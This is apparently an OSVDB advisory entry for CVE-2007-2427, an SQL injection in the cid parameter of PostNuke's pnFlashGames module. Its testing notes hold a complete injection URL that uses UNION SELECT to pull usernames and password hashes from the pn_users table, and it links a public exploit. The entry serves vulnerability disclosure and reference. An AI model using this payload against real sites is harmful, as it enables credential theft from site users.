pnFlashGames Module for PostNuke index.php cid Variable SQL Injection

2007-04-28T10:33:58
ID OSVDB:35474
Type osvdb
Reporter OSVDB
Modified 2007-04-28T10:33:58

Description

Manual Testing Notes

/index.php?module=pnFlashGames&func=view&cid=-1//union//select//0,pn_uname,2,pn_pass,4,5,6,7,8,9,10,11,12,13//from//pn_users//where/*/pn_uid=2/

References:

Secunia Advisory ID:25043 ISS X-Force ID: 33960 Generic Exploit URL: http://www.milw0rm.com/exploits/3813 FrSIRT Advisory: ADV-2007-1581 CVE-2007-2427 Bugtraq ID: 23701